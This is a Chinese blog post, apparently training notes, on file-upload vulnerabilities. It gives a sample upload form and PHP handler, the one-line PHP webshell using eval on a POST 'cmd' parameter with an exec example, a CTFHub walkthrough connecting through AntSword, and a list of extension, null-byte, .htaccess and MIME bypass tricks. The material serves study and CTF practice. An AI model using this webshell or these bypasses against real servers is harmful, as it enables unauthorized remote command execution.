<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>文件上传 | wOYOm的博客</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --light-background: url('https://image-assets.mihuashi.com/permanent/4636128|-2024/07/15/22/FoQgPgpt91kubhyYFgogmbaUv5ws.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer src="https://vercount.one/js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => {
 const script = document.createElement('script');
 script.src = 'https://vercount.one/js';
 document.head.appendChild(script);
});reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>文件上传</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2025-12-02T11:33:09.000Z" id="date"> 2025-12-02</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2025-12-03T11:42:58.298Z" id="updated"> 2025-12-03</time></div></span><br><span id="vercount_container_page_pv">页面浏览: <span class="control" id="vercount_value_page_pv">加载中...</span></span></div></div><hr><div id="post-content"><h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><h2 id="1-什么是文件上传漏洞"><a href="#1-什么是文件上传漏洞" class="headerlink" title="1.什么是文件上传漏洞"></a>1.什么是文件上传漏洞</h2><p>文件上传漏洞实际是因为开发者对于用户文件上传部分的控制不足或者处理缺陷，从而导致了用户可以越过自身有的权限向服务器上传<strong>可执行</strong>的动态脚本文件（前提是服务器会执行），这里的文件可以是木马，病毒，恶意脚本或者webshell等等。这个漏洞的问题本身不在于文件上传，而是文件上传之后服务器怎么处理，解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重后果。</p>
<h4 id="造成该漏洞的原因及原理"><a href="#造成该漏洞的原因及原理" class="headerlink" title="造成该漏洞的原因及原理"></a>造成该漏洞的原因及原理</h4><p>原因：</p>
<p>1.对于上传文件的后缀名没有严格过滤</p>
<p>2.对于文件头，二进制内容等等，用于描述文件类型的表述方法没有做检查</p>
<p>3.没有对文件做不可执行的权限的处理</p>
<p>原理：</p>
<p>在web中上传文件的原理是通过将表单设置为multipart&#x2F;form-data，同时加入文件域，而后通过 HTTP 协议将文件内容发送到服务器，服务器端读取这个分段 (multipart) 的数据信息，并将其中的文件内容提取出来并保存的。通常，在进行文件保存的时候，服务器端会读取文件的原始文件名，并从这个原始文件名中得出文件的扩展名，而后随机为文件起一个文件名 ( 为了防止重复 )，并且加上原始文件的扩展名来保存到服务器上。</p>
<h4 id="HTML表单文件上传机制"><a href="#HTML表单文件上传机制" class="headerlink" title="HTML表单文件上传机制"></a>HTML表单文件上传机制</h4><h5 id="1-1-表单文件上传基础"><a href="#1-1-表单文件上传基础" class="headerlink" title="1.1 表单文件上传基础"></a>1.1 表单文件上传基础</h5><p>在Web应用中，文件上传是一种常见的用户交互形式，允许用户通过表单上传文件到服务器。HTML表单提供了 <input type="file"> 元素，让用户可以选择文件进行上传。一旦用户选择了一个或多个文件，这些文件将被包含在表单数据中，并通过POST方法提交至服务器指定的处理脚本。</p>
<h5 id="1-2-表单结构和提交机制"><a href="#1-2-表单结构和提交机制" class="headerlink" title="1.2 表单结构和提交机制"></a>1.2 表单结构和提交机制</h5><p>一个典型的文件上传表单结构如下：</p>
<pre><code>&lt;form action=&quot;/upload&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;
    &lt;input type=&quot;file&quot; name=&quot;fileToUpload&quot; id=&quot;fileToUpload&quot;&gt;
    &lt;input type=&quot;submit&quot; value=&quot;Upload File&quot; name=&quot;submit&quot;&gt;
&lt;/form&gt;
</code></pre>
<p>html</p>
<p>在这个表单中， enctype 属性设置为 multipart&#x2F;form-data 是必须的，因为这是处理文件上传的正确编码类型。表单提交后，文件数据会被分割成多个部分，每个部分对应一个表单控件。 </p>
<h5 id="1-3上传过程"><a href="#1-3上传过程" class="headerlink" title="1.3上传过程"></a>1.3上传过程</h5><p>前端(可能会有检查限制)-&gt;二进制流（这里会发生服务器端的检查也就是检查文件内容进行进一步的限制）-&gt;服务器解析-&gt;储存到服务器的相应位置</p>
<p>访问时由于大部分网站会配置php解释器所以在访问.php文件的时候.php文件会被执行。</p>
<p><strong>用大家建的sqli-lab网站进行说明</strong></p>
<p>简单的上传页面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;!DOCTYPE html&gt;<br>&lt;html lang=&quot;en&quot;&gt;<br>&lt;head&gt;<br>    &lt;meta charset=&quot;UTF-8&quot;&gt;<br>    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;<br>    &lt;title&gt;POST数据包POC&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>&lt;form action=&quot;upload.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br>&lt;!--链接是当前打开的题目链接--&gt;<br>    &lt;label for=&quot;file&quot;&gt;文件名：&lt;/label&gt;<br>    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot;&gt;&lt;br&gt;<br>    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;提交&quot;&gt;<br>&lt;/form&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;<br></code></pre></td></tr></table></figure>

<p>服务器端处理文件的代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>// 1. 设置上传目录<br>$uploadDir = &#x27;uploads/&#x27;;<br><br>// 2. 创建目录（如果不存在）<br>if (!file_exists($uploadDir)) &#123;<br>    mkdir($uploadDir, 0777, true);<br>&#125;<br><br>// 3. 获取上传的文件信息<br>$fileName = $_FILES[&#x27;file&#x27;][&#x27;name&#x27;];      // 原始文件名<br>$tmpName = $_FILES[&#x27;file&#x27;][&#x27;tmp_name&#x27;];   // 临时文件路径<br>$fileSize = $_FILES[&#x27;file&#x27;][&#x27;size&#x27;];      // 文件大小<br>$fileError = $_FILES[&#x27;file&#x27;][&#x27;error&#x27;];    // 错误代码<br><br>// 4. 检查是否有上传错误<br>if ($fileError !== 0) &#123;<br>    die(&quot;上传失败，错误代码: $fileError&quot;);<br>&#125;<br><br>// 5. 生成安全的文件名（防止中文乱码和重复）<br>$safeFileName = time() . &#x27;_&#x27; . preg_replace(&#x27;/[^a-zA-Z0-9\.]/&#x27;, &#x27;_&#x27;, $fileName);<br><br>// 6. 移动文件到目标目录<br>$destination = $uploadDir . $safeFileName;<br><br>if (move_uploaded_file($tmpName, $destination)) &#123;<br>    echo &quot;&lt;h3&gt;success&lt;/h3&gt;&quot;;<br>    echo &quot;name: &quot; . $fileName . &quot;&lt;br&gt;&quot;;<br>    echo &quot;size: &quot; . round($fileSize / 1024, 2) . &quot; KB&lt;br&gt;&quot;;<br>    echo &quot;&lt;a href=&#x27;$destination&#x27;&gt;dowload&lt;/a&gt;&lt;br&gt;&lt;br&gt;&quot;;<br>    echo &quot;&lt;a href=&#x27;index.html&#x27;&gt;return&lt;/a&gt;&quot;;<br>&#125; else &#123;<br>    echo &quot;false！&quot;;<br>&#125;<br>?&gt;<br></code></pre></td></tr></table></figure>

<h2 id="2-我们要上传些什么？一句话木马登场"><a href="#2-我们要上传些什么？一句话木马登场" class="headerlink" title="2.我们要上传些什么？一句话木马登场~"></a>2.我们要上传些什么？一句话木马登场~</h2><h4 id="木马是什么？"><a href="#木马是什么？" class="headerlink" title="木马是什么？"></a>木马是什么？</h4><p>计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。<br>木马程序表面上是无害的，甚至对没有警戒的用户还颇有吸引力，它们经常隐藏在游戏或图形软件中，但它们却隐藏着恶意。这些表面上看似友善的程序运行后，就会进行一些非法的行动，如删除文件或对硬盘格式化。<br>完整的木马程序一般由两部分组成：一个是服务器端，一个是控制器端。“中了木马”就是指安装了木马的服务器端程序，若你的电脑被安装了服务器端程序，则拥有相应客户端的人就可以通过网络控制你的电脑。为所欲为。这时你电脑上的各种文件、程序，以及在你电脑上使用的账号、密码无安全可言了。</p>
<h4 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>这个一句话木马是什么意思呢</p>
<p>它实际上是一个php代码所以它必须写在<?php ?>里面才能被服务器认出来才会被解析执行</p>
<p>@是执行错误也不报错因为我们上传的cmd实际上是一个变量变量没有被定义是用不了的所以会报错，@存在的意义就是让我们的木马能够被正常执行</p>
<p>这句话的意思是什么呢？</p>
<p>我们上传了一个cmd的超全局变量供我们使用，且这个变量是以POST形式接受我们上传的参数的</p>
<p>（网站的参数上传有GET和POST两种方式）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">cmd=header(&quot;Content-type:text/html;charset=gbk&quot;);<br>exec(&quot;ipconfig&quot;,$out);<br>echo &#x27;&lt;pre&gt;&#x27;;<br>print_r($out);<br>echo &#x27;&lt;/pre&gt;&#x27;;<br></code></pre></td></tr></table></figure>

<p>这个时候我们就可以通过cmd这个变量去执行任意指令接管计算机了</p>
<p>当然一般情况我们会使用工具去进行连接。</p>
<h2 id="3-中国蚁剑"><a href="#3-中国蚁剑" class="headerlink" title="3.中国蚁剑"></a>3.中国蚁剑</h2><p>这就是我们会用到的工具</p>
<p>安装及原理：<a target="_blank" rel="noopener" href="https://blog.csdn.net/hj06112/article/details/150274005">https://blog.csdn.net/hj06112/article/details/150274005</a></p>
<p>其实原理就是利用上方的cmd变量去执行指令不过这里蚁剑自动帮你把指令输出执行并且把回显结果给返回给你。</p>
<p>7232</p>
<h2 id="4-题目演练"><a href="#4-题目演练" class="headerlink" title="4.题目演练"></a>4.题目演练</h2><p>ctfhub-文件上传无验证</p class='item-img' data-src='C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192234885.png'><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192234885.png" alt="image-20251203192234885" style="zoom:80%;" />

<p>游览上传我们写好的php木马</p class='item-img' data-src='C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192258348.png'><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192258348.png" alt="image-20251203192258348" style="zoom:80%;" />

<p><strong class='item-img' data-src='C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192306945.png'><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192306945.png" alt="image-20251203192306945" style="zoom:80%;" /></strong></p>
<p>相对路径</p>
<p>打开蚁剑添加数据</p>
<p>输入上传文件的位置，url</p>
<p>以及我们的木马密码也就是一句话木马里的变量cmd</p class='item-img' data-src='C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192545673.png'><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192545673.png" alt="image-20251203192545673" style="zoom:80%;" />

<img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192603287.png" alt="image-20251203192603287" style="zoom:80%;" />

<p>然后找flag即可</p class='item-img' data-src='C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192620035.png'><img src="C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20251203192620035.png" alt="image-20251203192620035" style="zoom:80%;" />

<h2 id="一些限制和绕过手段"><a href="#一些限制和绕过手段" class="headerlink" title="一些限制和绕过手段"></a>一些限制和绕过手段</h2><h4 id="一-前端限制"><a href="#一-前端限制" class="headerlink" title="一.前端限制"></a>一.前端限制</h4><h4 id="JavaScript前端文件上传验证"><a href="#JavaScript前端文件上传验证" class="headerlink" title="JavaScript前端文件上传验证"></a>JavaScript前端文件上传验证</h4><h5 id="一、基本概念"><a href="#一、基本概念" class="headerlink" title="一、基本概念"></a>一、基本概念</h5><p><strong>JavaScript文件上传验证</strong>是一种<strong>纯前端验证手段</strong>，主要作用是在文件上传到服务器之前，在用户的浏览器中进行初步检查。</p>
<h5 id="二、主要作用"><a href="#二、主要作用" class="headerlink" title="二、主要作用"></a>二、主要作用</h5><h6 id="1-用户体验优化"><a href="#1-用户体验优化" class="headerlink" title="1. 用户体验优化"></a>1. <strong>用户体验优化</strong></h6><ul>
<li><strong>即时反馈</strong>：用户选择文件后立即得到反馈</li>
<li><strong>避免不必要的等待</strong>：在本地就过滤掉明显不合规的文件</li>
<li><strong>清晰的错误提示</strong>：直接告诉用户问题所在</li>
</ul>
<h6 id="2-减轻服务器负担"><a href="#2-减轻服务器负担" class="headerlink" title="2. 减轻服务器负担"></a>2. <strong>减轻服务器负担</strong></h6><ul>
<li>过滤掉超大的文件（如超过限制的）</li>
<li>过滤掉明显错误的文件类型</li>
<li>减少无效请求到服务器</li>
</ul>
<h6 id="3-基本安全检查"><a href="#3-基本安全检查" class="headerlink" title="3. 基本安全检查"></a>3. <strong>基本安全检查</strong></h6><ul>
<li>检查文件扩展名（.jpg&#x2F;.png等）</li>
<li>检查文件大小</li>
<li>检查MIME类型</li>
</ul>
<h5 id="简单绕过方法"><a href="#简单绕过方法" class="headerlink" title="简单绕过方法"></a>简单绕过方法</h5><h6 id="1-禁用JavaScript"><a href="#1-禁用JavaScript" class="headerlink" title="1. 禁用JavaScript"></a><strong>1. 禁用JavaScript</strong></h6><ul>
<li>浏览器设置中关闭JavaScript</li>
<li>使用NoScript等插件</li>
</ul>
<h6 id="2-使用BurpSuite等工具"><a href="#2-使用BurpSuite等工具" class="headerlink" title="2. 使用BurpSuite等工具"></a><strong>2. 使用BurpSuite等工具</strong></h6><ul>
<li>拦截HTTP请求</li>
<li>直接修改文件名和内容</li>
<li>绕过所有前端检查</li>
</ul>
<h3 id="二、服务端检测绕过"><a href="#二、服务端检测绕过" class="headerlink" title="二、服务端检测绕过"></a>二、服务端检测绕过</h3><h4 id="2-1-扩展名检查"><a href="#2-1-扩展名检查" class="headerlink" title="2.1 扩展名检查"></a>2.1 扩展名检查</h4><p><strong>原理</strong>：黑名单&#x2F;白名单验证文件扩展名<br><strong>绕过方法</strong>：</p>
<ul>
<li><strong>IIS6目录解析</strong>：<code>/.asp/</code>目录下所有文件按ASP解析</li>
<li><strong>IIS6分号漏洞</strong>：<code>a.asp;jpg</code>被解析为ASP</li>
<li><strong>Windows空格和点</strong>：<code>a.php.</code>或<code>a.php[空格]</code>存储后去除点和空格</li>
<li><strong>Nginx空字节</strong>：<code>xxx.jpg%00.php</code>解析为PHP</li>
<li><strong>Apache解析</strong>：<code>a.php.rar</code>从右向左识别为PHP</li>
</ul>
<h4 id="2-2-Content-Type检查"><a href="#2-2-Content-Type检查" class="headerlink" title="2.2 Content-Type检查"></a>2.2 Content-Type检查</h4><p><strong>原理</strong>：检查HTTP头中的MIME类型<br><strong>绕过方法</strong>：使用BurpSuite修改Content-Type为允许的类型</p>
<h4 id="2-3-文件头检测"><a href="#2-3-文件头检测" class="headerlink" title="2.3 文件头检测"></a>2.3 文件头检测</h4><p><strong>原理</strong>：检查文件头部特征（前10字节）<br><strong>绕过方法</strong>：给脚本文件添加对应的文件头</p>
<h4 id="2-4-限制Web服务器行为"><a href="#2-4-限制Web服务器行为" class="headerlink" title="2.4 限制Web服务器行为"></a>2.4 限制Web服务器行为</h4><p><strong>原理</strong>：限制特定目录的脚本执行权限</p>
<p><strong>绕过方法</strong>：上传<code>.htaccess</code>文件覆盖服务器配置</p>
<h4 id="2-5-00截断"><a href="#2-5-00截断" class="headerlink" title="2.5 00截断"></a>2.5 00截断</h4><p><strong>原理</strong>：文件系统遇到<code>0x00</code>认为文件结束<br><strong>绕过方法</strong>：将文件名如<code>evil.php.jpg</code>改为<code>evil.php%00.jpg</code></p>
<p>（绕过方法希望大家能自己去多了解这里不做过多的赘述，培训更多的是想让大家了解漏洞的底层逻辑）</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2025/11/21/sql%E6%B3%A8%E5%85%A52/">sql注入2 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a><a onclick="BgmControl()"><svg id="bgm-control" viewBox="0 0 30 34" fill="#18d1ff" style="width: 24px; transition: transform .3s;margin-top: 4px"><path d="M25.998 23.422V11.29h3.999v12.132h-3.999zM19.497 6.234h4.001v22.243h-4.001V6.234zM12.998.867h4v32.978h-4V.867zm-6.5 5.367h4.001v22.243H6.498V6.234zm-6.5 5.056h4v12.132h-4V11.29z"></path></svg><audio id="bgm" src="/audio/bgm1.mp3" autoplay loop crossorigin="anonymous"> </audio></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://media.prts.wiki/c/cc/%E5%A4%B4%E5%83%8F_%E8%89%BE%E9%9B%85%E6%B3%95%E6%8B%89.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/">wOyOm</a></h1><div id="description"><p>记录web学习</p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">1.</span> <span class="toc-text">文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.1.</span> <span class="toc-text">1.什么是文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%A0%E6%88%90%E8%AF%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8E%9F%E5%9B%A0%E5%8F%8A%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.0.1.</span> <span class="toc-text">造成该漏洞的原因及原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#HTML%E8%A1%A8%E5%8D%95%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%9C%BA%E5%88%B6"><span class="toc-number">1.1.0.2.</span> <span class="toc-text">HTML表单文件上传机制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-1-%E8%A1%A8%E5%8D%95%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%9F%BA%E7%A1%80"><span class="toc-number">1.1.0.2.1.</span> <span class="toc-text">1.1 表单文件上传基础</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-2-%E8%A1%A8%E5%8D%95%E7%BB%93%E6%9E%84%E5%92%8C%E6%8F%90%E4%BA%A4%E6%9C%BA%E5%88%B6"><span class="toc-number">1.1.0.2.2.</span> <span class="toc-text">1.2 表单结构和提交机制</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-3%E4%B8%8A%E4%BC%A0%E8%BF%87%E7%A8%8B"><span class="toc-number">1.1.0.2.3.</span> <span class="toc-text">1.3上传过程</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%88%91%E4%BB%AC%E8%A6%81%E4%B8%8A%E4%BC%A0%E4%BA%9B%E4%BB%80%E4%B9%88%EF%BC%9F%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E7%99%BB%E5%9C%BA"><span class="toc-number">1.2.</span> <span class="toc-text">2.我们要上传些什么？一句话木马登场~</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%A8%E9%A9%AC%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">木马是什么？</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">一句话木马</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E4%B8%AD%E5%9B%BD%E8%9A%81%E5%89%91"><span class="toc-number">1.3.</span> <span class="toc-text">3.中国蚁剑</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E9%A2%98%E7%9B%AE%E6%BC%94%E7%BB%83"><span class="toc-number">1.4.</span> <span class="toc-text">4.题目演练</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E9%99%90%E5%88%B6%E5%92%8C%E7%BB%95%E8%BF%87%E6%89%8B%E6%AE%B5"><span class="toc-number">1.5.</span> <span class="toc-text">一些限制和绕过手段</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%80-%E5%89%8D%E7%AB%AF%E9%99%90%E5%88%B6"><span class="toc-number">1.5.0.1.</span> <span class="toc-text">一.前端限制</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#JavaScript%E5%89%8D%E7%AB%AF%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AA%8C%E8%AF%81"><span class="toc-number">1.5.0.2.</span> <span class="toc-text">JavaScript前端文件上传验证</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="toc-number">1.5.0.2.1.</span> <span class="toc-text">一、基本概念</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E4%B8%BB%E8%A6%81%E4%BD%9C%E7%94%A8"><span class="toc-number">1.5.0.2.2.</span> <span class="toc-text">二、主要作用</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-%E7%94%A8%E6%88%B7%E4%BD%93%E9%AA%8C%E4%BC%98%E5%8C%96"><span class="toc-number">1.5.0.2.2.1.</span> <span class="toc-text">1. 用户体验优化</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#2-%E5%87%8F%E8%BD%BB%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%B4%9F%E6%8B%85"><span class="toc-number">1.5.0.2.2.2.</span> <span class="toc-text">2. 减轻服务器负担</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#3-%E5%9F%BA%E6%9C%AC%E5%AE%89%E5%85%A8%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.0.2.2.3.</span> <span class="toc-text">3. 基本安全检查</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="toc-number">1.5.0.2.3.</span> <span class="toc-text">简单绕过方法</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-%E7%A6%81%E7%94%A8JavaScript"><span class="toc-number">1.5.0.2.3.1.</span> <span 